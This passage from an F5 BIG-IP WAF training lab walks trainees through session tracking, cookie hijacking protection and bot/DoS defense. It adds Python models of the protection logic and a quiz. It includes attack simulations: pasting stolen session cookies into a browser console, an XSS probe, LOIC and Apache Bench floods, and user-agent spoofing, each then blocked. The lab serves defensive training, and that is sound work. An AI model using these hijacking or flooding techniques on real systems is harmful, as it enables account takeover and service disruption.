You are no longer able to access the DVWA home page.
− Open a New private window (Firefox) and click the DVWA bookmark, and then log in as hacker / hackyou.
The request is blocked.
− Click the DVWA bookmark, then log in as bobsmith / password, and then close the page.
Only the malicious user, hacker, was blocked from logging into the web application.
− On the UDF page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− On the Traffic Generator desktop open Chrome and click the DVWA bookmark, and then log in
as hacker / hackyou, and then close the blocked page.
This user is blocked from all devices and all IP addresses.
− In the Configuration Utility reload the Event Logs > Application > Requests tab and select the most recent blocked
log entry, and then under Occurrences click 1.

The request was blocked because access was disallowed for this Username.
− Select the triangle icon at the end of Username.

The BIG-IP ASM security policy is now configured to block all requests from this user.
− Navigate to Security > Reporting > Application and right-click on Session Tracking Status and
select Open link in new tab, and then examine the new tab.

You use this page to view all usernames, device IDs, and session IDs that have triggered a violation detection
threshold value.
− Select the Block All checkbox and click Release and then OK, and then close the second tab.
− Open a New private window (Firefox) and click the DVWA bookmark, then log in as hacker / hackyou, and then
close Firefox.
This user can access the web application again.

IF TIME PERMITS – Enable Violation Detection by Device ID


Enable violation detection by device ID for dvwa_security_policy.

− In the Configuration Utility, on the Event Logs > Application > Requests tab click All Details and examine
the Device ID value.
The device ID is still not being tracked or logged.
− Navigate to Application Security > Sessions and Logins and right-click on Session Tracking and
select Open link in a new tab, and then in the new tab select the Detect Session Hijacking by Device ID Tracking
checkbox.
Note that Device-ID mode must be configured in a bot profile for this option to work.

− On the Block All tab, for Username Threshold clear the Enable checkbox.

→NOTE: It’s not required to disable the Username Threshold value. You’re disabling this to focus
on Device ID violations.

− Select the Device ID Threshold checkbox and enter 10 violations, then click Save, and then click Apply Policy.
− Open the Security > Bot Defense > Bot Defense Profiles page and click Create.
− For Profile Name enter dvwa_bot_profile.
− On the left menu select Browsers.

− From the Device ID Mode list select Generate Before Access.
− For Verification and Device-ID Challenges in Transparent Mode, click the Enabled button, and then click Save.
− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then select dvwa_bot_profile, then click Update, and then
close the second tab.
− Open a New private window (Firefox) and click the iMacros button, then in the iMacros pane
select Exercises > login requests.iim, then in the Max field enter 30, and then click Play (Loop).
You’ll notice the page is taking longer to reload. This is because the browser is negotiating the device ID with
BIG-IP ASM for each request.
− In the Configuration Utility reload the Event Logs > Application > Requests page, then select the most recent log
entry and click All Details, and then examine the Device ID value.
The Device ID is now being tracked and logged.
− In the DVWA page select Exercises > malicious logins.iim, and then click Play (Loop). Once the macro fails close the
Firefox window.
− Open a New private window (Firefox) and click the DVWA bookmark.
− Click the DVWA bookmark several times, and then close the blocked page.
After enough violations from this device within the violation detection period, you are blocked from accessing
the web application from this device.
− On the Traffic Generator desktop, open Firefox and click the DVWA bookmark, and then log in
as hacker / hackyou.
The web application is available from a different device.
− Click XSS reflected, then type <script> in the field, then click Submit, then reload the blocking page
around 15 times, and then close the Firefox window.
− Open a new Firefox window and click the DVWA bookmark, and then close the blocked page.
After enough violations, this device is also blocked.
− In the Configuration Utility reload the Event Logs > Application > Requests page and select the most recent
log entry, and then under Occurrences click 1.
The cause of this blocked request was that the user’s Device ID was disallowed.
− Open the Reporting > Application > Session Tracking Status page.
You can see there are currently two blocked devices, and when each blocking action expires.
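The violation detection seen in Task 3 (by username) and in this section (by device ID) is the same mechanism keyed on a different tracking value, so one model covers both. The Python below is an added example written for this guide, not F5 code: it counts violations per tracking key, applies the Block All action once a key reaches its threshold within the detection period, and releases or expires the block. The detection period and block duration are assumed values (the lab only sets the thresholds), as is the exact trigger point (the tenth violation in this model), and the class and method names are this example's own.

```python
"""Constructed model of session-tracking violation thresholds (not F5 code)."""
from collections import defaultdict


class SessionTracker:
    """Counts violations per tracking key (username, device_id, session_id) and
    applies Block All once a key's count reaches its threshold within the
    detection period.  Period and block duration are assumed values."""

    def __init__(self, thresholds, detection_period=900, block_duration=600):
        self.thresholds = dict(thresholds)     # e.g. {"username": 10}
        self.detection_period = detection_period
        self.block_duration = block_duration
        self.violations = defaultdict(list)    # (key_type, key) -> violation timestamps
        self.blocked_until = {}                # (key_type, key) -> expiry time

    def record_violation(self, key_type, key, now):
        """Return True if this violation triggered a block for its key."""
        if key_type not in self.thresholds or key is None:
            return False  # e.g. Device ID not tracked yet because no bot profile sets it
        history = self.violations[(key_type, key)]
        history.append(now)
        history[:] = [t for t in history if now - t < self.detection_period]
        if len(history) >= self.thresholds[key_type]:
            self.blocked_until[(key_type, key)] = now + self.block_duration
            return True
        return False

    def is_blocked(self, key_type, key, now):
        return self.blocked_until.get((key_type, key), 0) > now

    def check_request(self, now, username=None, device_id=None, session_id=None):
        """Return the blocking reason for a request carrying these keys, or None."""
        for key_type, key in (("username", username), ("device_id", device_id),
                              ("session_id", session_id)):
            if key is not None and self.is_blocked(key_type, key, now):
                return f"Access from {key_type} is disallowed"
        return None

    def release(self, key_type, key):
        """Session Tracking Status > Release: clear the block and its history."""
        self.blocked_until.pop((key_type, key), None)
        self.violations.pop((key_type, key), None)


def run_lab_scenario():
    """Task 3 (Username Threshold 10) followed by the Device ID Threshold section."""
    by_user = SessionTracker(thresholds={"username": 10})
    for i in range(15):                        # the hacker's repeated XSS attempts
        by_user.record_violation("username", "hacker", now=i)
    results = {
        "hacker_jumpbox": by_user.check_request(20, username="hacker", device_id="jumpbox"),
        "hacker_trafficgen": by_user.check_request(20, username="hacker", device_id="trafficgen"),
        "bobsmith": by_user.check_request(20, username="bobsmith", device_id="jumpbox"),
    }
    by_user.release("username", "hacker")
    results["hacker_after_release"] = by_user.check_request(21, username="hacker")

    by_device = SessionTracker(thresholds={"device_id": 10})
    for i in range(10):                        # malicious logins from the Jumpbox browser
        by_device.record_violation("device_id", "jumpbox", now=i)
    results["jumpbox_device"] = by_device.check_request(20, username="hacker", device_id="jumpbox")
    results["trafficgen_device"] = by_device.check_request(20, username="hacker", device_id="trafficgen")
    results["untracked_device"] = by_device.record_violation("device_id", None, now=0)
    results["jumpbox_after_expiry"] = by_device.check_request(9 + 600 + 1, device_id="jumpbox")
    return results


if __name__ == "__main__":
    for step, outcome in run_lab_scenario().items():
        print(f"{step}: {outcome}")
```

The username block applies regardless of which device or IP address the request arrives from, which is what the Traffic Generator step demonstrates, while the device ID block follows the browser and leaves the same user free on another device until that device reaches its own threshold.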

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
tmsh delete security bot-defense profile dvwa_bot_profile
exit


Question and Answer Key


Task 2 – Add Login Page Enforcement
Q: Was the third request blocked?
A: No

Q: Why or why not?


A: The specific URL (/vulnerabilities/brute/) wasn’t added to the Authenticated URLs list.


ASM Lesson 11 – Cookie Hijacking Protection



Exercise – Use Cookie Hijacking Protection


• Estimated completion time: 45 minutes.

Task 1 – Perform Session Cookie Hijacking


Use the Hackazon web application and the hacker’s attack server to simulate cookie hijacking.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool hackazon_pool members add { 10.1.20.20:80 { address 10.1.20.20 } }
tmsh create ltm virtual hackazon_virtual destination 10.1.10.43:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } rules { stealer } pool hackazon_pool

− Open Chrome and click the Hack Login bookmark, and then log in as cookiestealer / password.
This is a user account that the malicious user has set up on the Hackazon web application.
− Click Your Account > My profile.
The cookie stealer’s profile information displays.
− Leave the cookie stealer’s page open and open a new Firefox window and click the Hack Login bookmark, and then
log in as bobsmith / password.
− Click Your Account > My profile.
The victim’s profile information displays.
− Click the Hackazon logo, then click on a product on the page, and then click Add to Wish List.
− Open the Wish List > Wish Lists page.
The new product displays on the victim’s wish list page.
− Close the Firefox window (the victim’s page).
− Resize the PuTTY window by making it wide enough to fill your screen, and then type the following at
the CLI prompt:
tail -f /var/log/ltm

There are log entries identifying recent JSESSIONID and visited_products cookie values.
− Copy the JSESSIONID cookie value (everything from document.cookie to the closing '), and then press
the Enter key several times (to clear the screen).

− In the malicious user’s Chrome window press the F12 key to open the inspection tools.

− Select the Console tab, and then paste the copied cookie details.

− Press Enter, then close the inspection panel, and then reload the page.
The victim’s personal information displays.
− Open the Wish List > Wish Lists page.
The victim’s wish list displays. The malicious user successfully hijacked a session from an unsuspecting victim.
− Close the Chrome window.

Task 2 – Create a New Security Policy for Cookie Hijacking Protection


Create a security policy for hackazon_virtual that will block cookie hijacking attempts.

− Open Chrome and click the BIGIP_A bookmark, and then log into the BIG-IP system.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name: hackazon_security_policy
Policy Template: Comprehensive
Virtual Server: hackazon_virtual (HTTP)
Application Language: Unicode (utf-8)
Trusted IP Addresses: 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open a New private window (Firefox) and click the Hack bookmark.
− Click Sign In / Sign Up, and then log in as bobsmith / password.
− Click on the Hackazon logo, then click a product on the page, then click Logout, and then close the Firefox window.
− In the Configuration Utility open the Application Security > Headers > Cookies List page.
− Select the JSESSIONID checkbox and click Enforce and then OK.

The cookie that you’re protecting must be enforced for BIG-IP ASM to block violations against it.
− Open the Learning and Blocking Settings page, and then expand Cookies.

Notice that for the Modified domain cookie(s) violation, the Learn, Alarm, and Block checkboxes are selected.
This is because you used the Comprehensive policy template.
− Expand Sessions and Logins.
Notice that for the ASM Cookie Hijacking violation, the Learn, Alarm, and Block checkboxes are also selected.

− For ASM Cookie Hijacking clear the Learn, Alarm, and Block checkboxes, and then click Save.

→NOTE: You’re disabling this to illustrate how the feature works both disabled and enabled.

− In the Configuration Utility, open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode select Disabled, then click Save, and then click Apply Policy.

Task 3 – Re-attempt the Session Cookie Hijacking


Re-attempt the session cookie hijacking attack you performed earlier.

− Open a New private window (Firefox) and click the Hack Login bookmark, then log in as bobsmith / password,
then open the Wish List > Wish Lists page, and then close the Firefox window.
− In PuTTY rerun the tail command.

In addition to the JSESSIONID cookie, there is now an additional stolen cookie that begins with TS. This cookie was
created by BIG-IP ASM to protect the web application cookies from cookie hijacking and malicious manipulation.
− Copy the new JSESSIONID cookie value (everything from document.cookie to the closing ').
− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer / password, and then open the Profile page.
− Press the F12 key, then on the Console tab paste the copied cookie details and press Enter, then reload the page,
and then close the blocked page.
The attempt to steal the victim’s session cookie is now blocked by BIG-IP ASM.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Select the blocked [HTTP] /account log entry, and then under Occurrences click 1.

The request was blocked because it triggered the Modified domain cookie(s) violation for
the JSESSIONID cookie.
− View the Attack Types.
The attack type is Session Hijacking.
− Examine the bottom of the Request section.
The BIG-IP ASM log entry highlights the modified cookie within the HTTP request.

Task 4 – Update the Security Policy with ASM Cookie Hijacking Protection
Update hackazon_security_policy by enabling ASM cookie hijacking protection.

− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer / password, and then open the Profile page.
− Press the F12 key, then on the Console tab paste the previously copied JSESSIONID cookie details, and then
press Enter.
− In PuTTY copy the entire BIG-IP ASM cookie value directly after the JSESSIONID cookie (everything from
document.cookie=TS01… to the closing '), and then press the Enter key several times (to clear the screen).
− Paste the cookie value into the Chrome Console, then press Enter, then close the inspection panel, and then
reload the page.
The victim’s profile displays. The malicious user successfully hijacked the victim’s session because they had both
the JSESSIONID cookie and the BIG-IP ASM cookie that is used to protect the JSESSIONID cookie.
− Close the Chrome window.
− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the most recent [HTTP] /account log entry, and then click All Details.
Note that there is currently no Device ID value.

− Open the Learning and Blocking Settings page and expand Sessions and Logins.
− For ASM Cookie Hijacking select the Alarm and Block checkboxes, then click Save, and then click Apply Policy.
− Open the Security > Bot Defense > Bot Defense Profiles page and click Create.
− For Profile Name enter hackazon_bot_profile.
− On the left menu select Browsers.
− From the Device ID Mode list select Generate Before Access.
− For Verification and Device-ID Challenges in Transparent Mode, click the Enabled button, and then click Save.
− Open the Virtual Server List page and click hackazon_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then select hackazon_bot_profile, and then click Update.
− Open a New private window (Firefox) and click the Hack Login bookmark, then quickly type Ctrl+F5 to reload the
page about 25 times, and then close the Firefox window.
You’ll notice the page is taking longer to reload. This is because the browser is negotiating the device ID with
BIG-IP ASM for each request.
− In the Configuration Utility open the Event Logs > Application > Requests page and select the most recent
log entry, and then examine the Device ID value.
The Device ID value is now being tracked.
− Open a New private window (Firefox) and click the Hack Login bookmark, then log in as bobsmith / password,
then open the Wish List > Wish Lists page, and then close the Firefox window.

− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer / password, and then open the Profile page.
− In PuTTY rerun the tail command.

There is now an additional BIG-IP ASM cookie that begins with TSPD_101=.
− Copy the JSESSIONID cookie value (everything from document.cookie to the closing ').
− In Chrome, press the F12 key, then on the Console tab paste the copied cookie details, and then press Enter.
− In PuTTY, copy the entire BIG-IP ASM cookie value directly after the JSESSIONID cookie (the one that begins
with TS) and paste it into the Chrome Console, then press Enter, and then reload the page.
The request is now blocked by BIG-IP ASM.
− Close the blocked page, and then open a New incognito window (Chrome) and click the Hack Login bookmark,
then log in as cookiestealer / password, and then open the Profile page.
− In PuTTY copy the JSESSIONID cookie value, then paste it into the Chrome Console and press Enter.
− In PuTTY copy the entire BIG-IP ASM cookie value directly after the JSESSIONID cookie (the one that begins with
only TS), then paste it into the Chrome Console and press Enter.
− In PuTTY, copy the longest BIG-IP ASM cookie value (the last one, which begins with TSPD), paste it into the
Chrome Console and press Enter, reload the page, and then close the blocked page.
Even when using the second BIG-IP ASM cookie, malicious users are now unable to hijack sessions.
− In the Configuration Utility reload the Event Logs > Application > Requests page, then select the
new blocked /account log entry, and for ASM Cookie Hijacking, under Occurrences click 1.

The request was blocked because it triggered the Modified domain cookie(s) violation, in addition to
the ASM Cookie Hijacking violation (it was sent from the wrong device ID).
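The three outcomes above (JSESSIONID alone is blocked, JSESSIONID plus the TS cookie passes, and everything plus a different device ID is blocked) follow from binding the protective cookie to the session cookie and, once Device ID Mode is on, to the device. The model below is an added Python example, not BIG-IP ASM's code; the HMAC scheme, the key, the TS cookie name and the device-ID strings are assumptions, and only the names JSESSIONID and TSPD_101 come from the lab.

```python
import hashlib
import hmac
from typing import Dict, List, Optional

# Constructed demo key; a real WAF derives its own secrets.
WAF_KEY = b"constructed-demo-key-not-a-real-secret"

PROTECTED = "JSESSIONID"    # the application cookie enforced in Task 2
TS_COOKIE = "TS01demo"      # assumed name; the lab's protective cookie begins with TS01
DEVICE_COOKIE = "TSPD_101"  # the lab's device-ID cookie begins with TSPD_101=


def _mac(*parts: str) -> str:
    """HMAC over the joined parts (assumed binding scheme, not ASM's format)."""
    return hmac.new(WAF_KEY, "|".join(parts).encode(), hashlib.sha256).hexdigest()


def issue_cookies(session_value: str, device_id: Optional[str]) -> Dict[str, str]:
    """Cookies the WAF sets alongside the application's JSESSIONID.
    device_id is None while Device ID Mode is off (the Task 2 and 3 state)."""
    cookies = {PROTECTED: session_value,
               TS_COOKIE: _mac(PROTECTED, session_value, device_id or "")}
    if device_id is not None:
        cookies[DEVICE_COOKIE] = _mac("device", device_id)
    return cookies


def check_request(cookies: Dict[str, str], device_id: Optional[str],
                  cookie_hijacking_enabled: bool) -> List[str]:
    """Return the violations raised for one request. device_id is what THIS
    browser negotiated through the challenge; it cannot be pasted like a cookie."""
    violations: List[str] = []
    session_value = cookies.get(PROTECTED)
    if session_value is None:
        return violations  # nothing enforced in the request; app sees a logged-out user
    expected_ts = _mac(PROTECTED, session_value, device_id or "")
    if not hmac.compare_digest(cookies.get(TS_COOKIE, ""), expected_ts):
        violations.append("Modified domain cookie(s)")
    if cookie_hijacking_enabled and device_id is not None:
        expected_dev = _mac("device", device_id)
        if not hmac.compare_digest(cookies.get(DEVICE_COOKIE, ""), expected_dev):
            violations.append("ASM Cookie Hijacking")
    return violations


def replay_lab() -> Dict[str, List[str]]:
    """Replay the lab's attempts with constructed values."""
    victim_session = "0123456789ABCDEF"  # constructed JSESSIONID
    results: Dict[str, List[str]] = {}
    # Task 3: Device ID off, ASM Cookie Hijacking disabled, only JSESSIONID pasted.
    victim = issue_cookies(victim_session, None)
    results["task3_jsessionid_only"] = check_request({PROTECTED: victim[PROTECTED]}, None, False)
    # Task 4 before Device ID: JSESSIONID and the TS cookie are both pasted.
    results["task4_jsessionid_and_ts"] = check_request(dict(victim), None, True)
    # Task 4 after Generate Before Access: all cookies pasted, but the attacker's
    # browser negotiates its own device ID, so both bindings fail.
    victim = issue_cookies(victim_session, "victim-firefox-device")
    results["task4_with_device_id"] = check_request(dict(victim), "attacker-chrome-device", True)
    # The victim's own browser still passes every check.
    results["victim_own_browser"] = check_request(victim, "victim-firefox-device", True)
    return results
```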

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
tmsh delete security bot-defense profile hackazon_bot_profile
exit


ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection


Exercise – Use Layer 7 DoS and Bot Defense Protection


• Estimated completion time: 60 minutes.

Task 1 – Create an Event Log Profile for Layer 7 DoS and Bot Defense Logging
Create a security policy for dvwa_virtual using the Rapid Deployment security policy, and then create a security
event log profile to log both layer 7 DoS and bot defense events, and then add the log profile to dvwa_virtual.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− If necessary, update the Windows time:
o Select the clock and click Date and time settings.
o Click Sync now, and then close the Date & time dialog box.
− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } pool dvwa_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name: dvwa_security_policy
Policy Template: Rapid Deployment
Virtual Server: dvwa_virtual (HTTP)

→NOTE: A BIG-IP ASM security policy isn’t required to use an L7 DoS profile. You’re adding this so that you can
view request details using the BIG-IP ASM event log.

− Once the policy is created open the Security > Event Logs > Logging Profiles page and click Create.
− Name the new profile dvwa_log_profile.
− Select the Application Security, DoS Protection, and Bot Defense checkboxes.
− On the Application Security tab, from the Request Type list select All requests.
− On the DoS Protection tab select the Local Publisher checkbox.
− On the Bot Defense tab select the checkboxes for all options, and then click Create.

− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− For Log Profile select Enabled, then from the Available list select dvwa_log_profile, then click <<, and then
click Update.

Task 2 – Simulate Bot Attacks


Use several attack tools to simulate bot attacks targeting the web application.

− Open Start > XAMPP, then click Shell, and then close the XAMPP Control Panel.
− In the Shell window copy and paste (by right-clicking) the following command.
ab -n 100 -c 100 http://10.1.10.35/dvwa/images/login_logo.png

Apache Bench (ab) is a command line computer program for measuring the performance of web servers.
Apache Bench sends 200 requests for the login_logo.png file on the virtual server (10.1.10.35) and displays
the results in milliseconds.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
Because of the attack, 100 requests for the login_logo were processed by the BIG-IP ASM security policy
and forwarded to the web server.
− Select the Select all items checkbox, and then click Delete Requests.

− In the Shell window copy and paste the following command.


curl http://10.1.10.35/login.php?[1-60]

cURL is a command line tool for getting or sending files using URL syntax. The cURL result is the HTML web code
for the DVWA login page. The [1-60] code runs the curl command 60 times.
− In the Configuration Utility reload the Application > Requests page.
Because of the attack, 60 requests for the login.php URL were processed by the BIG-IP ASM security policy
and forwarded to the web server.
− Select the Select all items checkbox, and then click Delete Requests.
− In the Shell window copy and paste the following commands together.
cd c:\phantomjs\bin
phantomjs.exe index_page.js

Each time Damn Vulnerable Web App (DVWA) - Login displays, it indicates a successful request for the login page.
− Wait for the phantom.js command to complete before moving on.
− In the Configuration Utility reload the Application > Requests page.
Because of the attack, hundreds of requests for the index.php URL were considered legal by BIG-IP ASM
and forwarded to the web server for processing.
− Select the Select all items checkbox, and then select Delete Requests > Delete all requests.
− Open a new Chrome window and click the DVWA bookmark.
− Click the Chrome UA Spoofer button.

− Select Safari > Mac Safari 7.

− Click the Chrome UA Spoofer button and select Internet Explorer > Internet Explorer 6.
− Click the Chrome UA Spoofer button and select Android > Android KitKat.
− Click the Chrome UA Spoofer button and select Chrome > Default, and then close the Chrome window.
− In the Configuration Utility reload the Application > Requests page.
− Click the filter icon.

− Select the IP / Username / URL tab, then in the URL contains field type login.php, and then click Apply Filter.
This filters the list of log entries to just the requests for /login.php.
− Select each log entry from the bottom to the top and in the Request section view the User-Agent value.
The requests appear to have come from several browsers: Chrome, Safari, IE 6, and Android.
− Clear the filter by clicking on the X next to URL is /login.php, and then select the Select all items checkbox,
and then click Delete Requests.

Task 3 – Enable Bot Defense Protection


Configure a bot defense profile, and then add the profile to dvwa_virtual.

− Navigate to Security > Bot Defense and right-click on the + next to Bot Defense Profiles
and select Open link in new tab.
− In the new tab name the new profile dvwa_bot_defense_profile.
− For Enforcement Mode select Blocking.
− Under Bot Profile Configuration select Bot Mitigation Settings.
− From the Untrusted Bot list select CAPTCHA.
− From the Malicious Bot list select CAPTCHA.
− Under Bot Profile Configuration select Browsers.
− From the Browser Verification list select Verify Before Access, then modify the grace period value to 2 seconds,
and then click Save.
You’re lowering this value for the purposes of this exercise. In a production environment 300 seconds would be
an appropriate amount of time for a legitimate browser to reply to the JavaScript challenge.
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, then in the new tab
click dvwa_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then for Profile select dvwa_bot_defense_profile,
and then click Update.
− Open Internet Explorer and click the DVWA bookmark, and then once the login page displays close the page.

− In the Configuration Utility, using the dvwa_virtual tab open the Security > Event Logs > Bot Defense >
Bot Requests page.
− Select the first [HTTP]/ log entry, and then examine the Request Status value.

This log entry was generated when the web browser was challenged.
− Select the [HTTP]/login.php log entry, then click All Details, and then examine the Request Status
and Browser Verification Status values.
The request was Accepted because the browser passed the JavaScript challenge.
− Open a New incognito window (Chrome) and click the Chrome UA Spoofer button.
− Select Safari > Mac Safari 7, and then click the DVWA bookmark.

You are presented with a CAPTCHA challenge.


− Enter the CAPTCHA challenge (which is case-sensitive) and click submit to view the DVWA login page, and then
close the Chrome window.
− In the Configuration Utility, reload the Bot Defense > Bot Requests tab, then with the newest [HTTP]/ log entry
selected click All Details, and then view the Captcha Status value.

The request was Alarmed (but allowed) because the correct CAPTCHA challenge was entered.
− Examine the Bot Name and Bot Class values.
BIG-IP AWAF identified this from the Malicious bot class, presenting itself as Safari.
− Open a New incognito window (Chrome) and click the Chrome UA Spoofer button, then
select Android > Android KitKat, and then click the DVWA bookmark.
− Enter the wrong CAPTCHA challenge and click submit, and then close the Chrome window.
− In the Configuration Utility reload the Bot Defense > Bot Requests tab, then with the newest [HTTP]/ log entry
selected click All Details, and then view the Captcha Status value.

The request was Challenged, however the incorrect CAPTCHA challenge was entered.
− In the Shell window resubmit the following command.
curl http://10.1.10.35/login.php?[1-60]

The curl commands fail because they do not pass the CAPTCHA challenge.
− In the Configuration Utility reload the Bot Defense > Bot Requests tab.
Note that all the new log entries are Challenged, but none of these requests passed the CAPTCHA challenge.

− Examine the Bot Name and Bot Class values.
BIG-IP AWAF identified this as a curl bot from the Untrusted bot class.
− Reload the Application > Requests tab.
There are log entries from the Internet Explorer request. Because none of the curl requests passed the CAPTCHA
challenge, none of these requests were forwarded to the web servers.
− Select the Select all items checkbox, and then click Delete Requests.
− In the Bot Defense Profiles tab click dvwa_bot_defense_profile.
− Click Bot Mitigation Settings, then from the Untrusted Bot list select Block.
− From the Malicious Bot list select TCP Reset, and then click Save.
− In the Shell window resubmit the following command.
curl http://10.1.10.35/login.php?[1-60]

All the curl commands are now blocked.


− In the Shell window resubmit the following command.
phantomjs.exe index_page.js

The page title no longer displays. This is because phantom.js isn’t receiving an HTTP response due to failing
the browser challenge.
− In the Configuration Utility reload the Application > Requests tab.
There are no new log entries. All new curl and phantom.js requests were blocked by BIG-IP AWAF’s bot defense
protection prior to being examined by the BIG-IP ASM security policy.
− Reload the Bot Defense > Bot Requests tab.
The requests for /index.php were challenged by BIG-IP AWAF, which the script could not respond to.
− In the Shell window copy and paste the following command.
ab -n 1000 -c 1000 http://10.1.10.35/dvwa/images/login_logo.png

Apache Bench fails to submit the 1000 requests. The connection was closed by the remote host.
− Close XAMPP, and then in the Configuration Utility reload the Application > Requests tab.
There are no event log entries. All new ab requests were blocked by BIG-IP AWAF’s bot defense protection.
− Reload the Bot Defense > Bot Requests tab, and then examine the Request Status, Mitigation Action,
and Bot Details for the selected log entry.

The requests for login_logo.png were Denied with the mitigation of TCP Reset due to being recognized as being
a malicious bot. The bot signature is ab, and the bot signature category is DOS Tool.


Task 4 – Enable Layer 7 DoS Protection


Configure a layer 7 DoS protection profile, and then add the profile to dvwa_virtual.

− Using the Bot Defense Profiles tab open the Virtual Server List page and click dvwa_virtual, and then open
the Security > Policies page.
− From the Bot Defense Profile list select Disabled, and then click Update.

→NOTE: You’re disabling this profile to first show a successful layer 7 DoS attack.

− Open Start > LOIC, and then configure the attack using the following information.
IP: 10.1.10.35 (Click Lock on)
HTTP Subsite: /security.php
Method: HTTP
Wait for reply: Disabled (unchecked)

− Click IMMA CHARGIN MAH LAZER, then let the attack run for five seconds, and then click Stop flooding.
− In the Configuration Utility reload the Application > Requests tab.
In just a few seconds, several hundred requests for /security.php were considered legal and sent to
the web servers for processing.
− Reload the Application > Requests page to ensure there are no new log entries, then select the Select all items
checkbox, and then select Delete Requests > Delete all requests.
− Using the dvwa_virtual tab open the Security > DoS Protection > Protection Profiles page and click Create.
− Name the new profile dvwa_dos_profile.
− Under Application Security click Behavioral & Stress-based Detection.
− For Operation Mode click Blocking, and then change the value to Off.
− Click TPS-based Detection, then click Off, and then change the value to Blocking.
Using TPS-based detection, BIG-IP AWAF can prevent layer 7 DoS attacks by measuring each client's
transactions-per-second.
− For By Source IP click Edit, then select the Client Side Integrity Defense and Request Blocking checkboxes,
and then for Request Blocking select Block All.
If traffic from a source IP meets the conditions you’re about to set, BIG-IP AWAF will issue a JavaScript challenge.
AWAF will then block all suspicious IP addresses for the period set in the Prevention Duration section.
− Update the following values.
TPS increased by: 5%
and reached at least: 5
OR TPS reached: 5

− For Prevention Duration click Edit, then for Escalation Period edit the value to 5 seconds, and then click Finished.
You’re lowering these values for the purposes of running this exercise in a virtual environment.
The default settings are appropriate for most production environments.
− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− From the DoS Protection Profile list select Enabled, and then for Profile select dvwa_dos_profile.

− From the Bot Defense Profile list select Enabled, then for Profile select dvwa_bot_defense_profile,
and then click Update.
− Use this tab to open the Security > Reporting > DoS > Dashboard page, and then for Real Time switch
the toggle to ON.
− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− In LOIC click IMMA CHARGIN MAH LAZER and let the attack run for 25 seconds, and then click Stop Flooding.
You need to let the attack run long enough for the client-side integrity mitigation to kick in, and then
the request blocking mitigation to kick in after that.
− Open Internet Explorer and click the DVWA bookmark.
You are blocked from accessing the web page due to client-side integrity defense.
− Close Internet Explorer, then on the Traffic Generator desktop open Chrome and click the DVWA bookmark,
and then once the login page displays close the Chrome window.
The client-side integrity defense only affects the workstation that launched the attacks. All other users can still
access the web application.
− In the Configuration Utility reload the Application > Requests tab.
Only the requests from the Traffic Generator (10.1.10.51) were successful and were sent to the web servers.
− Close this tab, then reload the Bot Requests page, and then select one of the /security.php log entries.
The requests from LOIC were Denied because they were identified as a malicious bot.
− Close the Bot Requests tab, then in LOIC click IMMA CHARGIN MAH LAZER and let the attack run for 30 seconds,
and then click Stop Flooding.
− Examine the DoS Dashboard tab.
There is a DoS attack underway.
− Place your mouse over the attack to view attack details.

− Click the attack to select it.


− On the right-side of the page expand the Mitigations widget.

Initial requests matched the client-side integrity mitigation (a browser challenge), and then after a certain point
requests started getting blocked because their source IP address was blocked.


Task 5 – View Additional Bot Defense and DoS Reports


View additional logs and reports available with BIG-IP AWAF bot defense and layer 7 protection.

− Open the Event Logs > Bot Defense > Bot Traffic page.
This page displays several bot traffic statistics for the entire BIG-IP AWAF system.
− Under Virtual Servers click dvwa_virtual.
If your BIG-IP system has several virtual servers, you can view bot statistics by virtual server by selecting
a specific virtual server.
− In the Traffic by Class section, move your mouse over the chart sections.

This chart displays the number of requests handled by BIG-IP AWAF and the percentage discarded as being
generated by bots.
− Scroll down and view the details in the Bot Categories, Accepted Requests, and Denied Requests sections.

Questions:
How many requests matched the Browser Masquerading bot category? _____________

How many requests matched the DOS Tool bot category? _____________

How many accepted requests passed the CAPTCHA Challenge? _____________

